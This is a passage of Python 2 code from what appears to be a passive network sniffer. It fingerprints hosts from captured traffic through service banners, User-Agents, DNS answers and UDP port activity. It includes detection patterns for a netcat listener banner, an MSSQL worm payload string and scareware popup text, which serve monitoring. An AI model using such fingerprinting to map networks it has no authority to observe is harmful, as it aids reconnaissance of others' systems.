OneTuple[0].search(Payload)\n\t\t\t\t\t\t\t\tif (MatchObj != None):\n\t\t\t\t\t\t\t\t\tOutputDescription = OneTuple[1]\n\t\t\t\t\t\t\t\t\tif len(MatchObj.groups()) >= 1:\n\t\t\t\t\t\t\t\t\t\t#We have subexpressions matched, these need to be inserted into the description string\n\t\t\t\t\t\t\t\t\t\tfor Index in range(1,len(MatchObj.groups())+1):\n\t\t\t\t\t\t\t\t\t\t\tOutputDescription = OutputDescription.replace('$' + str(Index), MatchObj.group(Index))\n\t\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", OutputDescription)\n\t\t\t\t\t\t\t\t\tNmapServerDescription[sIP + \",TCP_\" + sport] = OutputDescription\n\t\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\tif (not ManualServerDescription.has_key(FromPort) ):\n\t\t\t\t\t\tif (sport == \"22\") and (Payload != None) and (Payload.find('SSH-') > -1):\n\t\t\t\t\t\t\tif ( (Payload.find('SSH-1.99-OpenSSH_') > -1) or (Payload.find('SSH-2.0-OpenSSH_') > -1) ):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"ssh/openssh\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"ssh/openssh\"\n\t\t\t\t\t\t\telif (Payload.find('SSH-1.5-') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"ssh/generic\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"ssh/generic\"\n\t\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\telif (sport == \"25\") and (Payload != None) and (Payload.find(' ESMTP Sendmail ') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"smtp/sendmail\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"smtp/sendmail\"\n\t\t\t\t\t\telif (sport == \"25\") and (Payload != None) and (Payload.find(' - Welcome to our SMTP server ESMTP') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"smtp/generic\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"smtp/generic\"\n\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\t#Check for port 80 and search for \"Server: \" once\n\t\t\t\t\t\telif (sport == \"80\") and (Payload != None) and (Payload.find('Server: ') > -1):\n\t\t\t\t\t\t\tif (Payload.find('Server: Apache') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/apache\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/apache\"\n\t\t\t\t\t\t\telif (Payload.find('Server: Embedded HTTP Server') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/embedded\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/embedded\"\n\t\t\t\t\t\t\telif (Payload.find('Server: gws') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/gws\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/gws\"\n\t\t\t\t\t\t\telif (Payload.find('Server: KFWebServer') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/kfwebserver\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/kfwebserver\"\n\t\t\t\t\t\t\telif (Payload.find('Server: micro_httpd') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/micro-httpd\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/micro-httpd\"\n\t\t\t\t\t\t\telif (Payload.find('Server: Microsoft-IIS') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/iis\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/iis\"\n\t\t\t\t\t\t\telif (Payload.find('Server: lighttpd') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/lighttpd\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/lighttpd\"\n\t\t\t\t\t\t\telif (Payload.find('Server: MIIxpc') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/mirrorimage\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/mirrorimage\"\n\t\t\t\t\t\t\telif (Payload.find('Server: mini_httpd') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/mini-httpd\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/mini-httpd\"\n\t\t\t\t\t\t\telif (Payload.find('Server: nc -l -p 80') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/nc\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/nc\"\n\t\t\t\t\t\t\telif (Payload.find('Server: nginx/') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/nginx\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/nginx\"\n\t\t\t\t\t\t\telif (Payload.find('Server: Nucleus') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/nucleus\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/nucleus\"\n\t\t\t\t\t\t\telif (Payload.find('Server: RomPager') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/rompager\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/rompager\"\n\t\t\t\t\t\t\telif (Payload.find('Server: Server') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/server\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/server\"\n\t\t\t\t\t\t\telif (Payload.find('Server: Sun-ONE-Web-Server/') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/sun-one\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/sun-one\"\n\t\t\t\t\t\t\telif (Payload.find('Server: TrustRank Frontend') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/trustrank\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/trustrank\"\n\t\t\t\t\t\t\telif (Payload.find('Server: YTS/') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/yahoo\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/yahoo\"\n\t\t\t\t\t\t\telif (Payload.find('HTTP/1.0 404 Not Found') > -1) or (Payload.find('HTTP/1.1 200 OK') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/generic\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/generic\"\n\t\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\telif (sport == \"110\") and (Payload != None) and (Payload.find('POP3 Server Ready') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"pop3/generic\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"pop3/generic\"\n\t\t\t\t\t\telif (sport == \"143\") and (Payload != None) and (Payload.find('* OK dovecot ready') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"imap/dovecot\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"imap/dovecot\"\n\t\t\t\t\t\telif (sport == \"143\") and (Payload != None) and (Payload.find(' IMAP4rev1 ') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"imap/generic\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"imap/generic\"\n\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\telif (sport == \"783\") and (Payload != None) and (Payload.find('SPAMD/1.1 ') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"spamd/spamd\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"spamd/spamd\"\n\t\t\t\t\t\telif ( (sport == \"3128\") or (sport == \"80\") ) and (Payload != None) and (Payload.find('Via: ') > -1) and (Payload.find(' (squid/') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"proxy/squid\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"proxy/squid\"\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\telif ((LiveTCPService.has_key(ToPort)) and (LiveTCPService[ToPort] == True)):\t\t#If the \"To\" side is a known TCP server:\n\t\t\t\t\tClientKey = sIP + \",TCP_\" + dport\t#Note: CLIENT ip and SERVER port\n\t\t\t\t\tif (not ClientDescription.has_key(ClientKey)):\n\t\t\t\t\t\tif (dport == \"22\") and (Payload != None) and ( (Payload.find('SSH-2.0-OpenSSH_') > -1) or (Payload.find('SSH-1.5-OpenSSH_') > -1) ):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"ssh/openssh\")\n\t\t\t\t\t\t#As cute as it is to catch this, it miscatches any relay that's carrying a pine-generated mail.\n\t\t\t\t\t\t#elif (dport == \"25\") and (Payload != None) and (Payload.find('Message-ID: <Pine.') > -1):\n\t\t\t\t\t\t#\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"smtp/pine\")\n\t\t\t\t\t\telif ( (dport == \"80\") or (dport == \"3128\") ) and (Payload != None) and (Payload.find('User-Agent: libwww-perl/') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"http/libwww-perl\")\n\t\t\t\t\t\telif ( (dport == \"80\") or (dport == \"3128\") ) and (Payload != None) and (Payload.find('User-Agent: Lynx') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"http/lynx\")\n\t\t\t\t\t\telif ( (dport == \"80\") or (dport == \"3128\") ) and (Payload != None) and (Payload.find('User-Agent: Mozilla') > -1) and (Payload.find(' Firefox/') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"http/firefox\")\n\t\t\t\t\t\telif ( (dport == \"80\") or (dport == \"3128\") ) and (Payload != None) and (Payload.find('User-Agent: Wget/') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"http/wget\")\n\t\t\t\t\t\telif (dport == \"143\") and (Payload != None) and (Payload.find('A0001 CAPABILITY') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"imap/generic\")\n\t\t\t\t\t\t\t#LogNewPayload(ClientPayloadDir, ClientKey, Payload)\n\t\t\t\t\t\telif (dport == \"783\") and (Payload != None) and (Payload.find('PROCESS SPAMC') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"spamd/spamc\")\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t#LogNewPayload(ClientPayloadDir, ClientKey, Payload)\n\t\t\t\telse:\t#Neither port pair is known as a server\n\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t#Following is debugging at best; it should only show up early on as the sniffer listens to conversations for which it didn't hear the SYN/ACK\n\t\t\t\t\t#print \"note: neither \" + FromPort + \" nor \" + ToPort + \" is listed as a live service.\"\n\t\t\telse:\t#Other TCP flag combinations here\n\t\t\t\tUnhandledPacket(p)\n\t\telif p['IP'].proto == 17 and (type(p['UDP']) == UDP):\t\t#UDP. We have to check the object type as well as we do get (corrupted? truncated?) packets with type 17 that aren't udp: AttributeError: 'NoneType' object has no attribute 'sport'\n\t\t\t#FIXME - possibly run udp packets through ServiceFPs as well?\n\t\t\tsport=str(p['UDP'].sport)\n\t\t\tdport=str(p['UDP'].dport)\n\t\t\tSrcService = sIP + \",UDP_\" + sport\n\t\t\tDstService = dIP + \",UDP_\" + dport\n\t\t\tSrcClient = sIP + \",UDP_\" + dport\n\t\t\tPayload = p['Raw.load']\n\n\t\t\t#Multicast DNS: http://files.multicastdns.org/draft-cheshire-dnsext-multicastdns.txt\n\t\t\t#- usually sent to 224.0.0.251 (or FF02::FB) (link-local multicast).\n\t\t\t#\t- if \".local.\" in query, these MUST be the target IPs\n\t\t\t#\t- non-local queries may be sent to these or normal dns servers\n\t\t\t#\t- rdns queries for \"254.169.in-addr.arpa.\" MUST be sent to 224.0.0.251\n\t\t\t#\t- rdns queries for \"8.e.f.ip6.arpa.\", \"9.e.f.ip6.arpa.\",\"a.e.f.ip6.arpa.\", and \"b.e.f.ip6.arpa.\" MUST be sent to the IPv6 mDNS link-local multicast address FF02::FB.\n\t\t\t#- sent to udp port 5353\n\t\t\t#- generic clients may use \"single-dns-object.local.\", such as \"sparrow.local.\"\n\t\t\t#- responses have IP TTL = 255 to check that packet originated on-lan\n\n\t\t\t#Multicast DNS, placed next to normal dns, out of numerical order\n\t\t\tif (dport == \"5353\") and ( (p['IP'].ttl == 1) or (p['IP'].ttl == 255) ):\n\t\t\t\tif ((not LiveUDPService.has_key(SrcClient)) or (LiveUDPService[SrcClient] == False)):\n\t\t\t\t\tLiveUDPService[SrcClient] = True\n\t\t\t\t\tif (dIP == \"224.0.0.251\"):\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"mdns/broadcastclient\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"mdns/client\")\n\n\t\t\t\t\t#Extract dns answers like with 53; change elif to if and add 5353 to ports on next if?\n\t\t\t\t\t#At the moment, no; scapy does not appear to parse 5353 as dns.\n\t\t\t\t\t#else:\n\t\t\t\t\t#\tUnhandledPacket(p)\n\t\t\t#FIXME - add check for \"if isinstance(p['DNS'], whatevertype):\there and at all p[] accesses.\n\t\t\telif (sport == \"53\") and (isinstance(p['DNS'], DNS)) and (p['DNS'].qr == 1):\t\t#qr == 1 is a response\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\t#FIXME - Also report the TLD from one of the query answers to show what it's willing to answer for?\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"dns/server\")\n\t\t\t\t#Now we extract dns answers. First, check that there's no dns error:\n\t\t\t\tif (p['DNS'].rcode == 0):\t\t\t#No error\n\t\t\t\t\tDNSBlocks = [ ]\n\t\t\t\t\tCNAMERecs = [ ]\t\t\t\t#We hold onto all cnames until we've processed all PTR's and A's here\n\t\t\t\t\tif (p['DNS'].ancount > 0):\t\t#If we have at least one answer from the answer block, process it\n\t\t\t\t\t\tDNSBlocks.append(p[DNS].an)\n\t\t\t\t\tif (p['DNS'].arcount > 0):\t\t#Likewise for the \"additional\" block\n\t\t\t\t\t\tDNSBlocks.append(p[DNS].ar)\n\t\t\t\t\tfor OneAn in DNSBlocks:\n\t\t\t\t\t\t#Thanks to Philippe Biondi for showing me how to extract additional records.\n\t\t\t\t\t\t#Debug(\"Start dns extract\" + str(p['DNS'].ancount))\n\t\t\t\t\t\t#OneAn = p[DNS].an\n\t\t\t\t\t\t#while OneAn is not NoPayload:\t\t#This doesn't seem to stop at the end of the list; incorrect syntax.\n\t\t\t\t\t\twhile isinstance(OneAn,DNSRR):\t\t#Somewhat equivalent:\twhile not isinstance(an, NoPayload):\n\t\t\t\t\t\t\n\t\t\t\t\t\t\t#print \"Type: \" + str(type(OneAn))\t\t#All of type scapy.DNSRR\n\t\t\t\t\t\t\tif (OneAn.rclass == 1) and (OneAn.type == 1):\t\t#\"IN\" class and \"A\" type answer\n\t\t\t\t\t\t\t\tDNSIPAddr = OneAn.rdata\n\t\t\t\t\t\t\t\tDNSHostname = OneAn.rrname.lower()\n\t\t\t\t\t\t\t\t#Check new hostname to see if it's in the list.\n\t\t\t\t\t\t\t\tif (not DNSRecord.has_key(DNSIPAddr + \",A\")) or (not(DNSHostname in DNSRecord[DNSIPAddr + \",A\"])):\n\t\t\t\t\t\t\t\t\tReportId(\"DN\", DNSIPAddr, \"A\", DNSHostname, \"\")\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 2):\t\t\t#\"IN\" class and \"NS\" answer\n\t\t\t\t\t\t\t\tpass\t\t\t\t\t\t\t#Perhaps later\n\t\t\t\t\t\t\t\t#Like cnames, this is object -> nameserver hostname, so these would need to be queued like cnames until we're done with A's and PTR's.\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 5):\t\t\t#\"IN\" class and \"CNAME\" answer\n\t\t\t\t\t\t\t\tCNAMERecs.append(OneAn)\t\t\t\t\t#Remember the record; we'll process these after the PTR's and A's\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 6):\t\t\t#\"IN\" class and \"SOA\" answer\n\t\t\t\t\t\t\t\tpass\t\t\t\t\t\t\t#Not immediately useful, perhaps later\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 12):\t\t#\"IN\" class and \"PTR\" type answer\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#For input of '182.111.59.66.in-addr.arpa.' :\n\t\t\t\t\t\t\t\tDNSIPAddr = OneAn.rrname.replace(\".in-addr.arpa.\", \"\")\t\t# '182.111.59.66'\n\t\t\t\t\t\t\t\tDNSIPAddr = DNSIPAddr.split('.')\t\t\t\t# ['182', '111', '59', '66']\n\t\t\t\t\t\t\t\tDNSIPAddr.reverse()\t\t\t\t\t\t# ['66', '59', '111', '182']\n\t\t\t\t\t\t\t\tDNSIPAddr = string.join(DNSIPAddr, '.')\t\t\t\t# '66.59.111.182'\n\t\t\t\t\t\t\t\t#Check that we end up with a legal IPv4 address before continuing; we're getting garbage.\n\t\t\t\t\t\t\t\tif (re.search('^[1-9][0-9\\.]*[0-9]$', DNSIPAddr) == None):\n\t\t\t\t\t\t\t\t\tDebug(\"Odd PTR rrname: \" + OneAn.rrname)\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tDNSHostname = OneAn.rdata.lower()\n\t\t\t\t\t\t\t\t\tif (not DNSRecord.has_key(DNSIPAddr + \",PTR\")) or (not(DNSHostname in DNSRecord[DNSIPAddr + \",PTR\"])):\n\t\t\t\t\t\t\t\t\t\tReportId(\"DN\", DNSIPAddr, \"PTR\", DNSHostname, \"\")\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 15):\t\t#\"IN\" class and \"MX\" answer\n\t\t\t\t\t\t\t\tpass\t\t\t\t\t\t\t#Possibly later\n\t\t\t\t\t\t\telif (OneAn.rclass == 1) and (OneAn.type == 28):\t\t#\"IN\" class and \"AAAA\" answer\n\t\t\t\t\t\t\t\tDNSIPAddr = OneAn.rdata.upper()\n\t\t\t\t\t\t\t\tDNSHostname = OneAn.rrname.lower()\n\t\t\t\t\t\t\t\tif (not DNSRecord.has_key(DNSIPAddr + \",AAAA\")) or (not(DNSHostname in DNSRecord[DNSIPAddr + \",AAAA\"])):\n\t\t\t\t\t\t\t\t\tReportId(\"DN\", DNSIPAddr, \"AAAA\", DNSHostname, \"\")\n\n\t\t\t\t\t\t\t#Move to the next DNS object in the \"an\" block\n\t\t\t\t\t\t\tOneAn = OneAn.payload\n\t\t\t\t\tfor OneCNAME in CNAMERecs:\t\t#Now that we have all A/PTR's, go back and turn cname records into pseudo-A's\n\t\t\t\t\t\tif isinstance(OneCNAME,DNSRR):\n\t\t\t\t\t\t\tAlias = OneCNAME.rrname.lower()\n\t\t\t\t\t\t\tExisting = OneCNAME.rdata.lower()\n\t\t\t\t\t\t\tif isFQDN(Alias) and isFQDN(Existing):\n\t\t\t\t\t\t\t\tif HostIPs.has_key(Existing):\n\t\t\t\t\t\t\t\t\tfor OneIP in HostIPs[Existing]:\t\t\t\t#Loop through each of the IPs for the canonical name, and\n\t\t\t\t\t\t\t\t\t\tif (not DNSRecord.has_key(OneIP + \",CNAME\")) or (not(Alias in DNSRecord[OneIP + \",CNAME\"])):\n\t\t\t\t\t\t\t\t\t\t\tReportId(\"DN\", OneIP, \"CNAME\", Alias, \"\")\t#report them as kind-of A records for the Alias.\n\t\t\t\t\t\t\t\t#If we don't have a A/PTR record for \"Existing\", just ignore it. Hopefully we'll get the Existing A/PTR in the next few answers, and will re-ask for the CNAME later, at which point we'll get a full cname record.\n\t\t\t\t\t\t\t\t#else:\n\t\t\t\t\t\t\t\t#\tDebug(\"CNAME \" + Alias + \" -> \" + Existing + \" requested, but no IP's for the latter, skipping.\")\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tDebug(\"One of \" + Alias + \" and \" + Existing + \" isn't an FQDN, skipping cname processing.\")\n\t\t\t\telif (p['DNS'].rcode == 1):\t\t\t#FormErr: server responding to an improperly formatted request\n\t\t\t\t\tpass\n\t\t\t\telif (p['DNS'].rcode == 2):\t\t\t#ServFail: domain exists, root nameservers list authoritative name servers, but authNS's won't answer queries\n\t\t\t\t\tpass\n\t\t\t\telif (p['DNS'].rcode == 3):\t\t\t#NXDOMAIN: root nameservers don't have any listing (domain doesn't exist or is on hold)\n\t\t\t\t\tpass\n\t\t\t\telif (p['DNS'].rcode == 5):\t\t\t#Query refused\n\t\t\t\t\tpass\n\t\t\t\telse:\t#rcode indicates an error\n\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (dport == \"53\") and (type(p['DNS']) == DNS) and (p['DNS'].qr == 0):\t#dns query\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"dns/client\")\n\t\t\telif (sport == \"67\") and (dport == \"68\"):\t\t#Bootp/dhcp server talking to client\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"bootpordhcp/server\")\n\t\t\telif (sport == \"68\") and (dport == \"67\"):\t\t#Bootp/dhcp client talking to server\n\t\t\t\tif (sIP != \"0.0.0.0\"):\t\t\t\t#If the client is simply renewing an IP, remember it.\n\t\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"bootpordhcp/client\")\n\t\t\t\t#else:\t\t\t\t\t\t#If you want to record which macs are asking for addresses, do it here.\n\t\t\t\t#\tpass\n\t\t\telif (sport == \"123\") and (dport == \"123\") and (p['NTP'].stratum != ''):\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"ntp/generic\")\n\t\t\telif (dport == \"123\") and ( (dIP == \"216.115.23.75\") or (dIP == \"216.115.23.76\") or (dIP == \"69.59.240.75\") ):\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"ntp/vonageclient\")\n\t\t\telif (sport == \"123\") and ( (sIP == \"216.115.23.75\") or (sIP == \"216.115.23.76\") or (sIP == \"69.59.240.75\") ):\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"ntp/vonageserver\")\n\t\t\telif (dport == \"137\"):\t\t\t#netbios-ns\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (p['Ethernet'].dst.upper() == \"FF:FF:FF:FF:FF:FF\"):\t\t\t#broadcast\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"netbios-ns/broadcastclient\")\n\t\t\t\t\telif (Payload != None) and (Payload.find('CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA') > -1):\t#wildcard\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"netbios-ns/wildcardclient\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"netbios-ns/unicastclient\")\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"500\") and (dport == \"500\") and (p['ISAKMP'].init_cookie != ''):\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"isakmp/generic\")\n\t\t\telif (dport == \"512\"):\t\t\t#BIFF\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('@') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"biff/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif ( (dport == \"1026\") or (dport == \"1027\") or (dport == \"1028\") ):\t#winpopup spam client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and ( (Payload.find('Download Registry Update from:') > -1) or (Payload.find('CRITICAL ERROR MESSAGE! - REGISTRY DAMAGED AND CORRUPTED.') > -1) or (Payload.find('Your system registry is corrupted and needs to be cleaned immediately.') > -1) or (Payload.find('CRITICAL SYSTEM ERRORS') > -1) ):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"winpopup/spamclient\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (dport == \"1434\"):\t\t#Probable mssql attack\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('Qh.dll') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"mssql/clientattack\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"1900\") and (dport == \"1900\") and (dIP == \"239.255.255.250\"):\t\t#SSDP\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('NOTIFY') 